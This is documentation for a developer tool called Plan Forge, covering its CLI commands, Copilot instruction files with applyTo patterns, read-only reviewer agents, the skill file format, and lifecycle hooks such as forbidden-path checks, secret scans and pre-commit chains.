Six commands shipped between v2.99 and v3.5 that postdate the original CLI reference. Each is a thin wrapper over a v3.x MCP tool or subsystem; see the per-command "Also available as" link for the full MCP / REST mapping.
.github/copilot-memory-hints.md from forge decisions, trajectories, auto-skills, OpenBrain entries. Hash-deduped and atomic; safe to run repeatedly. See Chapter 26 — Copilot Integration Trilogy.
| Flag | Type | Description |
|---|---|---|
| --since | duration (optional) | Limit to trajectories in the last N (e.g. 14d, 30d). Default: 50 most recent. |
| --explain | flag (optional) | Verbose: show which entries were included/excluded and why |
| --preview | flag (optional) | Generate without writing, print the diff |
pforge sync-memories
pforge sync-memories --since=14d
pforge sync-memories --preview --explain
Also available as: forge_sync_memories MCP tool.
.github/copilot-instructions.md by composing project profile + principles + extra instruction files + .forge.json commitments. Output is deterministic; same inputs produce identical files.
| Flag | Type | Description |
|---|---|---|
| --preview | flag (optional) | Generate without writing, print the resulting content |
| --force | flag (optional) | Overwrite even if content hash matches (bypass dedup) |
pforge sync-instructions
pforge sync-instructions --preview
pforge sync-instructions --force
Also available as: forge_sync_instructions MCP tool, POST /api/copilot-instructions/sync REST endpoint.
| Flag | Type | Description |
|---|---|---|
| --peer | string (optional) | Limit sync to one configured peer name |
| --apply | flag (optional) | Write the merged records (default: dry-run) |
| --since | duration (optional) | Only consider records newer than N (default: 7d) |
pforge sync-spaces # dry-run, all peers
pforge sync-spaces --peer=billing-svc --apply
pforge sync-spaces --since=30d --apply
Configured under brain.federation.repos in .forge.json.
| Flag | Type | Description |
|---|---|---|
| --min-severity | enum (optional) | low · medium · high · critical (default: medium) |
| --max-slices | number (optional) | Cap the number of slices (default: 10) |
| --phase-name | string (optional) | Override the auto-generated phase name |
pforge plan-from-sarif codeql-results.sarif
pforge plan-from-sarif scan.sarif --min-severity=high --max-slices=5
pforge plan-from-sarif sec.sarif --phase-name="Phase-SEC-FIX"
Writes to docs/plans/Phase-N-PLAN.md. Plan still needs hardening via step2-harden-plan.prompt.md before execution.
| Flag | Type | Description |
|---|---|---|
| --since | duration (optional) | Window (default: 24h). Common: 7d for weekly roll-up. |
| --format | enum (optional) | markdown (default) · json |
| --post | flag (optional) | Send via configured notification channel (Slack, Teams, etc.) |
| --rebuild | flag (optional) | Recompute from logs instead of reading cached .forge/digests/YYYY-MM-DD.json |
pforge digest # today's, markdown
pforge digest --since=7d # weekly
pforge digest --format=json | jq # pipe-friendly
pforge digest --post # broadcast to configured channel
Backs the Yesterday's Digest dashboard tile. Cron-friendly: pforge digest --post at 09:00 weekdays = free standup.
forge_sweep + forge_tempering_drain in a single tightened loop suitable for pre-release gates.
| Flag | Type | Description |
|---|---|---|
| --strict | flag (optional) | Exit non-zero on any finding (default: report-only) |
| --include | glob (optional) | Limit scan to files matching a glob (default: all tracked) |
| --max-rounds | number (optional) | Cap convergence rounds (default: 3) |
pforge hammer-fm
pforge hammer-fm --strict # CI gate
pforge hammer-fm --include="src/**/*.ts"
Pairs well with forge_classifier_issue when findings are noise rather than bugs; see Chapter 27 — Team Coordination.
.forge/forge-master/sessions/.
| Flag | Type | Description |
|---|---|---|
| --resume | string (optional) | Session ID to continue (omit to start new) |
| --model | string (optional) | Override the configured Forge-Master model |
| --quiet | flag (optional) | Suppress thought-trace output (final answer only) |
pforge fm-session "Why did Phase-31 slice 4 fail?"
pforge fm-session --resume=fm-7f3a-...
pforge fm-session --quiet "What's the cheapest quorum for Phase-32?"
Also available as: forge_master_ask MCP tool (one-shot), POST /api/forge-master/ask REST endpoint.
fm-session --resume=... from.
| Flag | Type | Description |
|---|---|---|
| --limit | number (optional) | Max results (default: 5) |
| --since | duration (optional) | Only sessions from last N (default: 90d) |
| --json | flag (optional) | Machine-readable output |
pforge fm-recall "gate timeout"
pforge fm-recall "snapshot pop strategy" --limit=10
pforge fm-recall "cost anomaly Phase-31" --since=30d --json
Backed by the L2 search index over .forge/forge-master/sessions/*.jsonl.
The MCP server is started directly with Node.js, not through the pforge CLI:
.vscode/mcp.json for auto-start.
# Full MCP server (normal usage, started by VS Code via mcp.json)
node pforge-mcp/server.mjs
# Dashboard + REST API only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only
# Custom project path
node pforge-mcp/server.mjs --project /path/to/project
This chapter covers the happy path for each command. For exhaustive edge-case documentation, see the source: CLI-GUIDE.md on GitHub
Make it yours: principles, profiles, custom instructions, configuration hierarchy.
Every project gets two layers of guardrails. Layer 1 is your non-negotiable standards, the rules every project gets whether they ask or not. Layer 2 is your project's specific ambitions, the coverage targets, latency SLAs, and domain rules that make this project different from the last one.
Ships with every preset. Architecture, security, testing, error handling, type safety, async patterns. You get these automatically.
Generated per-project. Coverage targets, latency SLAs, compliance requirements, domain rules. You customize these.
If Layer 2 conflicts with Layer 1, Layer 2 wins for that specific project. Example: Layer 1 says "TDD for business logic" → Layer 2 says "TDD for ALL code" → Layer 2 applies.
Principles declare what your project believes: non-negotiable commitments about technology, architecture, and quality. They're checked automatically during Steps 1, 2, and 5.
.github/prompts/project-principles.prompt.md
docs/plans/PROJECT-PRINCIPLES.md
## Technology Commitments
- PostgreSQL for all persistence, no MongoDB, no SQLite in production
- All services communicate via gRPC, no REST between internal services
## Architecture Commitments
- All data access goes through repositories, no direct SQL in services
- Background jobs use BackgroundService + PeriodicTimer, no Hangfire
## Quality Commitments
- 90% test coverage on business logic, non-negotiable
- No secrets in code, ever. Use IConfiguration + Key Vault
The profile tells the AI how to write code. It is generated from an interview about your standards:
.github/prompts/project-profile.prompt.md
.github/instructions/project-profile.instructions.md
| | Project Principles | Project Profile |
|---|---|---|
| What it is | "We use PostgreSQL, not MongoDB" | "Use parameterized queries with Dapper" |
| Who writes it | You (or guided by workshop) | Generated from interview |
| Testing | "90% coverage, non-negotiable" | "Use xUnit with [Fact] and [Theory]" |
| When it matters | Rejects a PR that uses MongoDB | Tells AI how to write the query |
copilot-instructions.md
This is the master config file, loaded every session, for every file. Keep it focused:
applyTo patterns.
Create a new .instructions.md file in .github/instructions/ with YAML frontmatter:
---
description: Billing domain rules, Stripe integration, invoice generation
applyTo: "**/billing/**,**/invoices/**,**/payments/**"
---
# Billing Domain Rules
- All money amounts stored as `decimal(18,4)`, never `float`
- Use Stripe SDK v45+, never raw HTTP calls
- Every payment mutation must be idempotent (use idempotency keys)
- Invoice PDFs generated async via background service
- All billing events published to `billing.*` topic
When you edit src/billing/InvoiceService.cs, this file loads automatically alongside the universal baseline.
applyTo Pattern Reference
| Pattern | Loads When |
|---|---|
| '**' | ALL files (use sparingly) |
| '**/*.cs' | Any C# file |
| '**/*.test.ts' | TypeScript test files |
| '**/auth/**' | Files in any auth/ directory |
| 'docs/plans/**' | Plan documents |
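To check a pattern before committing it, the patterns in the table can be approximated with a small glob-to-regex translation. This is a simplified sketch, not the matcher your editor actually uses: it handles only `*`, `**`, and comma-separated lists, and the function names are hypothetical.

```javascript
// Simplified glob translation for sanity-checking applyTo patterns.
// Not the editor's real matcher; supports only `*`, `**`, and literal text.
function globToRegExp(glob) {
  let pattern = "";
  for (let i = 0; i < glob.length; i++) {
    const ch = glob[i];
    if (ch === "*" && glob[i + 1] === "*") {
      if (glob[i + 2] === "/") {
        pattern += "(?:.*/)?"; // "**/" matches zero or more leading directories
        i += 2;
      } else {
        pattern += ".*"; // trailing "**" matches anything, including slashes
        i += 1;
      }
    } else if (ch === "*") {
      pattern += "[^/]*"; // "*" stays within one path segment
    } else {
      pattern += ch.replace(/[.+?^${}()|[\]\\]/g, "\\$&"); // escape regex metacharacters
    }
  }
  return new RegExp(`^${pattern}$`);
}

// An applyTo value may list several comma-separated globs; any match loads the file.
function matchesApplyTo(applyTo, filePath) {
  return applyTo.split(",").some((glob) => globToRegExp(glob.trim()).test(filePath));
}

console.log(matchesApplyTo("**/billing/**,**/invoices/**,**/payments/**", "src/billing/InvoiceService.cs"));
```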
Agent definitions live in .github/agents/. Each is a Markdown file with YAML frontmatter that declares the agent's role, tool restrictions, and expertise:
---
name: "billing-reviewer"
description: "Audit billing code for Stripe compliance and financial accuracy"
tools: ["read_file", "grep_search", "semantic_search"]
---
Agents are read-only: they can search and read but can't edit files. This makes them safe to run as independent auditors. To create a new agent, copy an existing one and modify the expertise section.
| Agent | Role | How to invoke |
|---|---|---|
| plan-health-auditor | Reads run history, memories, bugs, and the active plan to report on slice sizing, gate coverage, missing forbidden actions, and scope contract completeness. Emits a markdown report to .forge/health/latest.md. | forge_master_ask({ message: "@plan-health-auditor weekly report" }) or forge_delegate_to_agent with agent: "plan-health-auditor". |
Plan Forge ships a built-in plan-health-auditor agent (.github/agents/plan-health-auditor.agent.md) that reads plan files and reports on slice sizing, gate coverage, missing forbidden actions, and scope contract completeness. Invoke it via forge_delegate_to_agent with agent: "plan-health-auditor" or from the Dashboard Agents tab. Read-only; cannot modify plans.
Skills are multi-step procedures in .github/skills/*/SKILL.md. Each skill defines steps, validation gates, and expected outputs. Every skill follows the Skill Blueprint format, including Temper Guards, Warning Signs, and Exit Proof sections. To create a custom skill:
.github/skills/my-workflow/SKILL.md with steps, gates, and description
/my-workflow in Copilot Chat
Plan Forge fires eight lifecycle hooks across three buckets. The Copilot session hooks live in .github/hooks/plan-forge.json and run during every agent turn; the LiveGuard / orchestration hooks are configured in .forge.json#hooks and fire during plan execution; the plan-execution guard is a single Node script that runs ahead of every commit during pforge run-plan. The tables below are the normative reference: every hook the orchestrator knows about, what triggers it, what it can block, and where to configure it. The canonical ordered list of hook names is the HOOK_PASCAL array in pforge-mcp/enums.mjs; both pforge smith (PowerShell + bash) and the orchestrator read from this single source of truth.
Configured in .github/hooks/plan-forge.json. Scripts live in .github/hooks/scripts/ with a .sh POSIX variant and a .ps1 Windows variant; the hook runner picks the right one per host. The default timeout for each hook is shown in the Timeout column; long-running scripts that exceed it are killed and skipped (not failed).
| Hook | Trigger | Effect | Blocks? | Timeout | Script |
|---|---|---|---|---|---|
| SessionStart | Once at the start of every Copilot session. | Injects Project Principles, current phase, and Forbidden Actions from the active plan into the agent's context. Also drains queued OpenBrain entries from .forge/openbrain-queue.jsonl when present. | No (advisory) | 10 s | session-start.{sh,ps1} |
| PreToolUse | Before every agent tool call that writes to the filesystem. | Two checks run in series: check-forbidden compares the target path against the active plan's Forbidden Actions block; check-predeploy short-circuits when a slice is about to enter a deploy step. Either can deny the tool call. | Yes | 5 s / 10 s | check-forbidden.{sh,ps1} · check-predeploy.{sh,ps1} |
| PostToolUse | After every agent tool call that wrote to the filesystem. | Auto-formats the touched file with the project's formatter (Prettier, dotnet format, Black, etc.) and then runs a quick scan for stub markers (TODO, FIXME, "throw new NotImplementedException", etc.). Stub findings are advisory: they surface in the agent's next turn but do not block. | No (advisory) | 15 s / 15 s | post-edit-format.{sh,ps1} · post-edit-validate.{sh,ps1} |
| Stop | When the agent's turn ends. | Warns if files were edited during the turn but no test run was detected. This is the "don't ship untested changes" guard rail. Output appears in the next turn's context as a banner. | No (advisory) | 10 s | stop-check-tests.{sh,ps1} |
To disable a session hook for one project, edit .github/hooks/plan-forge.json and remove the entry from the relevant array. To disable a session hook globally, delete or rename the file; missing hook files are silently ignored.
Configured in .forge.json#hooks. These fire during plan execution: the orchestrator invokes the relevant hook function directly (no shell scripts) and reads the matching .forge.json sub-block to pick up project-specific tuning. All hooks are opt-in at the project level and ship with safe defaults.
| Hook | Trigger | Effect | Blocks? | Configure |
|---|---|---|---|---|
| PreDeploy | Before pforge run-plan enters a slice flagged as a deploy step. | Runs forge_secret_scan across the configured git range (scanSince, default HEAD~1) plus forge_env_diff to flag missing env keys. Blocks the slice when severity ≥ high. | Yes (when blockOnSecrets: true) | hooks.preDeploy |
| PostSlice | After every slice commit that matches the conventional-commit pattern (feat\|fix\|refactor\|perf\|chore\|style\|test). | Runs forge_drift_report and compares the new drift score against the prior score. Emits a warning when the delta exceeds warnDeltaThreshold (default 10); emits a red banner when the score drops below scoreFloor (default 70). Fires only once per pforge run-plan invocation. | No (advisory) | hooks.postSlice |
| PreAgentHandoff | On agent-to-agent turn boundaries in multi-agent mode, for example, when the executor agent hands off to the reviewer agent at the end of a slice. | Injects LiveGuard context (drift score, MTTR, open incidents) into the next agent's prompt. Also posts a snapshot to OpenClaw when openclaw.endpoint is configured. Skipped when the orchestrator sets PFORGE_QUORUM_TURN=1 during quorum fan-out (one of the documented bypasses, see Appendix U — CLI Internal). | No (advisory) | hooks.preAgentHandoff |
| PostRun (invokeAuditor) | After every completed pforge run-plan run when hooks.postRun.invokeAuditor.onFailure is true and the run failed, or when everyNRuns is set and the run counter is a multiple of N. | Triggers the plan-health auditor agent (A4). The auditor receives cross-run anomaly context from runWatch(mode: "cross-run") and writes its report to .forge/health/latest.md (configurable via forgeMaster.auditor.outputPath). | No (advisory) | hooks.postRun.invokeAuditor |
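The PostSlice thresholds in the table can be read as two independent checks on the drift score. The sketch below uses the documented defaults; the function name, the signal labels, and the use of the absolute difference as the "delta" are assumptions.

```javascript
// Sketch of the PostSlice comparison. Defaults (10 and 70) are from the table;
// treating the delta as an absolute difference is an assumption.
function evaluatePostSlice(priorScore, newScore, options = {}) {
  const { warnDeltaThreshold = 10, scoreFloor = 70 } = options;
  const delta = Math.abs(newScore - priorScore);
  const signals = [];
  if (delta > warnDeltaThreshold) signals.push("warning");   // large swing since the prior score
  if (newScore < scoreFloor) signals.push("red-banner");     // score fell below the floor
  return { delta, signals, blocks: false };                  // PostSlice is advisory only
}

console.log(evaluatePostSlice(95, 60));
```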
Example .forge.json snippet for the PostRun auditor hook:
{
"hooks": {
"postRun": {
"invokeAuditor": {
"onFailure": true,
"everyNRuns": 10
}
}
}
}
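With a configuration like the one above, the trigger rule for the auditor can be sketched as follows. The `run.failed` and `run.counter` fields and the function name are hypothetical; only `onFailure` and `everyNRuns` come from the documented config.

```javascript
// Sketch of the PostRun trigger rule. `run.failed` and `run.counter` are
// hypothetical field names; `onFailure` and `everyNRuns` are the documented keys.
function shouldInvokeAuditor(config, run) {
  const { onFailure = false, everyNRuns } = config;
  if (onFailure && run.failed) return true; // failed run with onFailure enabled
  // Periodic trigger: only when everyNRuns is a positive integer.
  return Number.isInteger(everyNRuns) && everyNRuns > 0 && run.counter % everyNRuns === 0;
}

const auditorConfig = { onFailure: true, everyNRuns: 10 };
console.log(shouldInvokeAuditor(auditorConfig, { failed: false, counter: 20 }));
```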
To disable a LiveGuard hook, set the corresponding block in .forge.json to { "enabled": false } or, for finer-grained control, lower its threshold (e.g. blockOnSecrets: false keeps the PreDeploy scan running but downgrades it to advisory). Full schema in Appendix T — hooks.
One special hook lives outside both buckets above: PreCommit.mjs is a Node script in .github/hooks/ that runs synchronously before every commit during pforge run-plan. It now executes an ordered PreCommit chain declared in hooks.preCommit.chain[]. The built-in chain starts with master-branch-reject (refuse interactive commits on master/main) and then diff-classify (run forge_diff_classify against the staged diff). The first non-zero exit aborts the commit.
| Hook | Trigger | Effect | Blocks? | Override |
|---|---|---|---|---|
| PreCommit | Before every git commit during pforge run-plan. | Runs each hooks.preCommit.chain[] entry in order. The default chain begins with master-branch-reject (blocks unauthorized commits on master/main) and then diff-classify (blocks high/critical findings from forge_diff_classify). First non-zero exit aborts the chain. | Yes | Set PFORGE_ALLOW_MASTER_COMMIT=1 for one invocation, or edit .forge.json#hooks.preCommit.chain to add/remove entries. Discouraged: the defaults exist because LiveGuard runs caught several accidental-master-commit incidents in the v3.3.x sweeps. |
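The "first non-zero exit aborts" behavior is a plain ordered chain. In the sketch below the two entries are hypothetical stand-ins that only mimic the described checks (they do not call forge_diff_classify), and the context fields are invented for the example.

```javascript
// Ordered chain runner: stop at the first entry that returns a non-zero exit code.
function runChain(chain, context) {
  for (const entry of chain) {
    const exitCode = entry.run(context);
    if (exitCode !== 0) return { committed: false, abortedBy: entry.name, exitCode };
  }
  return { committed: true, abortedBy: null, exitCode: 0 };
}

// Hypothetical stand-ins for the two built-in entries; context fields are assumptions.
const defaultChain = [
  {
    name: "master-branch-reject",
    run: (ctx) => (["master", "main"].includes(ctx.branch) && !ctx.allowMasterCommit ? 1 : 0),
  },
  {
    name: "diff-classify",
    run: (ctx) => (["high", "critical"].includes(ctx.worstFinding) ? 1 : 0),
  },
];

console.log(runChain(defaultChain, { branch: "main", allowMasterCommit: false, worstFinding: "low" }));
```

Because the chain stops at the first failure, later entries never see a commit that an earlier entry rejected, so ordering the cheap checks first keeps aborted commits fast.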
When the orchestrator needs to fire a hook, it looks for configuration in this order. The first source that yields a non-empty value wins, with a built-in default at the end:
PFORGE_DISABLE_TEMPERING=1, PFORGE_ALLOW_MASTER_COMMIT=1, PFORGE_QUORUM_TURN=1. See Appendix U — Feature Toggles and CLI Internal for the full list.
.forge.json#hooks for LiveGuard hooks, or the matching entry in .github/hooks/plan-forge.json for session hooks.
.sh/.ps1 file is treated as "hook disabled" rather than an error. This lets you delete an unused hook script without editing the JSON.
orchestrator.mjs. The defaults are deliberately conservative: every hook is enabled, every blocking hook actually blocks, every advisory hook actually emits its advisory.
You can add scripts to existing buckets without modifying the orchestrator. For session hooks, drop a new script into .github/hooks/scripts/ and append an entry to the appropriate array in plan-forge.json; the next agent session picks it up. For LiveGuard hooks, the contract is fixed by the orchestrator: you can't add new ones, but you can swap a hook's behavior by wrapping the underlying tool (e.g. point hooks.preDeploy.scanSince at a wider git range, or pre-populate .forge/secret-scan-cache.json with a custom scanner's output).
A representative custom SessionStart hook that injects organization-specific reminders lives in templates/.github/hooks/scripts/session-start.ps1; copy it and edit the $reminders block. The script must emit a single line of JSON in the form {"hookSpecificOutput":{"hookEventName":"SessionStart","additionalContext":"..."}} for the agent host to honor the injection.
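To make the output contract concrete, here is a sketch that builds the same single-line JSON in JavaScript. The shipped template is PowerShell; this Node version, the function name buildSessionStartOutput, and the reminder strings are illustrative assumptions only.

```javascript
// Sketch only: buildSessionStartOutput and the reminder text are hypothetical.
function buildSessionStartOutput(reminders) {
  const payload = {
    hookSpecificOutput: {
      hookEventName: 'SessionStart',
      additionalContext: reminders.join('\n'),
    },
  };
  // JSON.stringify without an indent argument emits one line;
  // newlines inside additionalContext are escaped as \n.
  return JSON.stringify(payload);
}

const sessionStartLine = buildSessionStartOutput([
  'Use the staging database for all local tests.',
  'Tag the platform team on infrastructure changes.',
]);
console.log(sessionStartLine);
```

Joining reminders before serializing keeps the output on one line even when the context itself spans several lines.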
Three levels of configuration, from team-wide to personal:
| Level | File | Scope | Committed? |
|---|---|---|---|
| Team | .forge.json | Shared project config (presets, models, escalation) | Yes |
| Personal | preferences.json | Individual developer preferences | No (.gitignore) |
| Editor | .vscode/settings.json | VS Code and Copilot settings | Yes (recommended) |
Personal preferences override team config for the individual developer. Editor settings control VS Code behavior (agent mode enabled, prompt files, etc.).
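The override rule can be pictured as a merge in which personal values replace team values key by key. This is a sketch under assumptions: the function name, the example keys, and the choice of a deep merge are all hypothetical, since this page does not say how the two files are combined.

```javascript
// Sketch only: effectiveConfig, the example keys, and deep-merge semantics are assumptions.
function isPlainObject(value) {
  return value !== null && typeof value === 'object' && !Array.isArray(value);
}

function effectiveConfig(team, personal) {
  const merged = { ...team };
  for (const [key, value] of Object.entries(personal)) {
    const bothObjects = isPlainObject(value) && isPlainObject(team[key]);
    // Nested objects merge recursively; everything else is replaced by the personal value.
    merged[key] = bothObjects ? effectiveConfig(team[key], value) : value;
  }
  return merged;
}

const teamConfig = { preset: 'dotnet', models: { default: 'model-a', review: 'model-b' } };
const personalPrefs = { models: { default: 'model-c' } };
console.log(effectiveConfig(teamConfig, personalPrefs));
```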
For a field-by-field schema of .forge.json, every settable key with type, default, example, and change impact, see Appendix T — .forge.json Reference. For everything that lives outside .forge.json, provider API keys, server ports, orchestrator timing, see Appendix U — Environment Variables Reference.
📄 Full reference: CUSTOMIZATION.md on GitHub
The guardrail system: what each file covers, when it activates, and how agents review your code.
Each instruction file has an applyTo glob pattern in its YAML frontmatter. When you edit a file matching that pattern, the instruction auto-loads into the AI's context with no manual action. It's the difference between drowning the AI in every rule you have and having the right guidance whisper only when it's relevant. (For full details on writing your own applyTo patterns, see Chapter 9.)
---
description: Security best practices, input validation, auth, secrets
applyTo: "**/auth/**,**/security/**,**/middleware/**"
---
# Security Rules
- Parameterized queries only, never string interpolation in SQL
- Input validation at system boundaries
- No secrets in code, use environment variables or secret managers
...
Say you ask Copilot Chat to make a change to src/auth/token-validator.cs. Here's what auto-loads, and why each one matters:
| File that loads | Why it matched | What it whispers to the AI |
|---|---|---|
| architecture-principles.instructions.md | Universal, applyTo: "**" | Stop! Before writing code, ask the 5 architecture questions. Don't bypass scope, don't skip tests. |
| security.instructions.md | Path matched **/auth/** | Parameterized queries only. No secrets in code. Validate inputs at every boundary. OWASP Top 10 defense patterns. |
| auth.instructions.md | Path matched **/auth/** | JWT/OIDC patterns, token expiry rules, RBAC enforcement, multi-tenant isolation guards. |
| testing.instructions.md | Universal, applyTo: "**" | Tests required for new behavior. Use the project's test framework. Cover edge cases (expired token, tampered signature). |
The AI now has 4 focused instruction files in its context, not 17. If you switch to editing src/db/UserRepository.cs, security stays loaded but auth swaps out for database.instructions.md. The right rules whisper at the right time, without you doing anything.
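The matching step can be approximated with a small glob-to-regex converter. This is only a sketch: the agent host evaluates applyTo itself, and its exact glob dialect may differ from the simplified rules assumed here (`**/` spans any number of directories, `*` stays within one path segment). The helper names are hypothetical.

```javascript
// Sketch only: globToRegExp and matchesApplyTo are hypothetical helpers,
// not the host's real matcher.
function globToRegExp(glob) {
  let out = '';
  for (let i = 0; i < glob.length; i++) {
    const ch = glob[i];
    if (ch === '*') {
      if (glob[i + 1] === '*') {
        if (glob[i + 2] === '/') {
          out += '(?:.*/)?'; // "**/" matches zero or more directories
          i += 2;
        } else {
          out += '.*'; // trailing "**" matches anything
          i += 1;
        }
      } else {
        out += '[^/]*'; // single "*" stays inside one path segment
      }
    } else {
      out += ch.replace(/[.+^${}()|[\]\\?]/g, '\\$&'); // escape regex metacharacters
    }
  }
  return new RegExp('^' + out + '$');
}

// applyTo holds a comma-separated list of globs; any match loads the file.
function matchesApplyTo(applyTo, filePath) {
  return applyTo.split(',').some((glob) => globToRegExp(glob.trim()).test(filePath));
}

const securityApplyTo = '**/auth/**,**/security/**,**/middleware/**';
console.log(matchesApplyTo(securityApplyTo, 'src/auth/token-validator.cs'));
console.log(matchesApplyTo('**', 'docs/readme.md'));
```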
Below is the full catalog: which files exist, what each covers, and which patterns trigger them.
These four files ship with every preset and form the universal baseline:
| File | applyTo | Purpose |
|---|---|---|
| architecture-principles | ** | 5 questions before coding, 4-layer architecture, separation of concerns |
| git-workflow | ** | Conventional commits, push reminders, version-aware messaging |
| ai-plan-hardening-runbook | docs/plans/** | Quick-reference when editing plan files |
| status-reporting | docs/plans/**, .forge/** | Standard output templates for orchestration updates |
Each preset installs 17 domain-specific instruction files. They auto-load based on what you're editing:
| File | Domain | Loads When Editing |
|---|---|---|
| api-patterns | REST conventions, pagination, error responses | Controllers, routes, endpoints |
| auth | JWT/OIDC, RBAC (role-based access control), multi-tenant isolation | Auth modules, middleware |
| caching | Redis, in-memory cache, TTL strategies | Cache services, config |
| database | ORM/query patterns, migrations, connections | Repositories, SQL, models |
| dapr | Dapr sidecar patterns, pub/sub, state management | Dapr config, service invocation |
| deploy | Dockerfiles, health checks, container optimization | Dockerfiles, compose, k8s |
| errorhandling | Exception hierarchy, ProblemDetails (RFC 7807 standard JSON error responses), error boundaries | Error handlers, middleware |
| graphql | Schema design, resolvers, query patterns, Hot Chocolate / Apollo | GraphQL types, resolvers |
| messaging | Pub/sub, job queues, event-driven patterns | Event handlers, message consumers |
| multi-environment | Dev/staging/prod config, environment detection | Config files, env setup |
| naming | Naming conventions, file organization, namespace rules | All code files |
| observability | OpenTelemetry, structured logging, metrics | Logging, tracing, health |
| performance | Hot/cold path analysis, allocation reduction | Performance-critical code |
| security | Input validation, secret management, CORS | Auth, security, middleware |
| testing | Unit tests, integration tests, test containers | Test files |
| version | Semantic versioning, commit-driven bumps | Version files, changelogs |
| project-principles | Activates when PROJECT-PRINCIPLES.md exists | Plan files, reviews |
Some presets add frontend.instructions.md for React/Vue patterns. The azure-iac preset replaces several app-specific files with Bicep/Terraform equivalents.
Every instruction file includes Temper Guards (shortcut prevention tables) and Warning Signs (observable anti-patterns). These help agents avoid common quality erosion and help reviewers detect violations.
📄 Full reference: capabilities, Multi-Agent Setup — GitHub Copilot
Complete reference for the 14 reviewer agents, 16 slash-command skills (6 shared + 10 per stack), and the lifecycle hook system.
14 reviewer agents organized in three categories. Agents are read-only: they audit code but can't edit files.
These vary by preset; examples for dotnet:
| Agent | Reviews |
|---|---|
| architecture-reviewer | Layer separation, dependency direction, SOLID |
| database-reviewer | Query patterns, migrations, connection management |
| deploy-reviewer | Dockerfile, health checks, container optimization |
| performance-reviewer | Hot paths, allocations, async patterns |
| security-reviewer | Input validation, auth, secrets, OWASP |
| test-runner | Test coverage, test patterns, mocking strategy |
Shared across all presets, same expertise regardless of language:
| Agent | Reviews |
|---|---|
| api-contract-reviewer | API versioning, backward compatibility, OpenAPI |
| accessibility-reviewer | WCAG 2.2, semantic HTML, ARIA, keyboard nav |
| multi-tenancy-reviewer | Tenant isolation, data leakage, RLS, cache separation |
| cicd-reviewer | Pipeline safety, secrets, rollback strategies |
| observability-reviewer | Structured logging, distributed tracing, metrics |
| dependency-reviewer | CVEs, outdated packages, license conflicts |
| compliance-reviewer | GDPR, CCPA, SOC2, PII handling, audit logs |
| error-handling-reviewer | Exception hierarchy, error boundaries, ProblemDetails |
Drive the 7-step pipeline with handoff buttons between stages:
| Agent | Pipeline Step | What It Does |
|---|---|---|
| specifier | Step 0 | Interviews you, produces specification |
| preflight | Step 1 | Verifies prerequisites, checks environment readiness |
| plan-hardener | Step 2 | Converts spec into hardened execution contract |
| executor | Step 3 | Executes slices, validates gates |
| reviewer-gate | Step 5 | Independent audit for drift and compliance |
| shipper | Step 6 | Commits, updates roadmap, captures lessons |
Skills are multi-step procedures the AI runs end-to-end: they read files, write files, run terminal commands, and emit events the dashboard can watch. Unlike agents (which review) and hooks (which gate), skills do work. There are two tiers: shared skills installed across every preset, and stack-specific skills tailored to the chosen language.
Every skill is a single Markdown file with YAML frontmatter followed by numbered ### N. Step Name sections. The skill-runner parses the file into a step DAG, executes bash blocks per step, and emits lifecycle events to the WebSocket hub. The contract:
| Frontmatter field | Required | Purpose |
|---|---|---|
| name | Yes | Slash-command alias (the file's directory name). name: database-migration → /database-migration. |
| description | Yes | One-paragraph trigger guidance. The classifier matches user prompts against this field. Best practice: include USE FOR and DO NOT USE FOR phrases. |
| argument-hint | Optional | One-line example of the argument shape, surfaced in the slash-command picker. |
| tools | Optional | Allow-list of tools the skill may invoke. Inline (tools: [run_in_terminal, read_file]) or block list. Enforces least-privilege at runtime. |
After the frontmatter, three Markdown sections are recognized by the runner:
- ## Steps, the main body. Each ### N. Step Name heading defines one step; bash fences inside are executed in order. A step with no bash block is informational and auto-passes.
- ## Safety Rules, bullet list of invariants. Surfaced in the dashboard and injected into the skill's context.
- ## Persistent Memory, optional. Block appended to the skill's L2 capture so OpenBrain remembers cross-run lessons.
Two structural patterns are recognized inside step bodies:
- If <condition> → <action>. If the action contains the word skip, the runner aborts the current step's remaining commands. Used for early-exit paths like “If migration fails → rollback & STOP.”
Every skill execution emits four event types on the hub (cataloged in Appendix V: Skills events):
| Event | When | Payload |
|---|---|---|
| skill-started | Once, at entry | { skillName, stepCount } |
| skill-step-started | Before each step | { skillName, stepNumber, stepName } |
| skill-step-completed | After each step | { skillName, stepNumber, stepName, status, duration } |
| skill-completed | Once, at exit | { skillName, passed, failed, duration } |
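The file contract above (frontmatter, then numbered `### N. Step Name` sections with bash fences) can be illustrated with a minimal parser. This is a sketch, not the real skill-runner: the function name parseSkill, the returned shape, and the simplified key/value frontmatter handling are all assumptions made for illustration.

```javascript
// Sketch only: parseSkill is a hypothetical helper, not the shipped skill-runner.
const FENCE = '`'.repeat(3); // built at runtime so the sample below nests cleanly

function parseSkill(markdown) {
  const lines = markdown.split(/\r?\n/);
  const frontmatter = {};
  let i = 0;
  if (lines[0] === '---') {
    // Read simple "key: value" pairs until the closing delimiter.
    for (i = 1; i < lines.length && lines[i] !== '---'; i++) {
      const field = /^([\w-]+):\s*(.*)$/.exec(lines[i]);
      if (field) frontmatter[field[1]] = field[2].replace(/^"(.*)"$/, '$1');
    }
    i++; // skip the closing ---
  }
  const steps = [];
  let current = null; // step currently being collected
  let bash = null; // lines of the open bash fence, or null when outside one
  for (; i < lines.length; i++) {
    const line = lines[i];
    if (bash !== null) {
      if (line.startsWith(FENCE)) {
        current.commands.push(bash.join('\n'));
        bash = null;
      } else {
        bash.push(line);
      }
      continue;
    }
    const heading = /^### (\d+)\. (.+)$/.exec(line);
    if (heading) {
      current = { number: Number(heading[1]), name: heading[2].trim(), commands: [] };
      steps.push(current);
    } else if (/^#{1,6} /.test(line)) {
      current = null; // any other heading closes the current step
    } else if (current && line.trim() === FENCE + 'bash') {
      bash = [];
    }
  }
  return { frontmatter, steps };
}

const sampleSkill = [
  '---',
  'name: deploy-canary',
  'description: "Deploy to canary"',
  '---',
  '## Steps',
  '### 1. Build & Push',
  FENCE + 'bash',
  'docker build -t myregistry/myapp:canary .',
  FENCE,
  '### 2. Announce',
  'Tell the team the canary is live.',
  '## Safety Rules',
  '- NEVER deploy from a dirty working tree',
].join('\n');

const parsedSkill = parseSkill(sampleSkill);
console.log(parsedSkill.frontmatter.name, parsedSkill.steps.map((s) => s.name));
```

In this sketch a step with no bash fence simply ends up with an empty commands array, which mirrors the "informational, auto-passes" rule.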
- Slash command: /database-migration add user_profiles table. The most common path; works in VS Code Copilot, Claude, Cursor, and Codex once setup.ps1 -Agent <name> has run.
- MCP tool: forge_run_skill with { name, args }. Returns the same lifecycle events plus a structured result envelope.
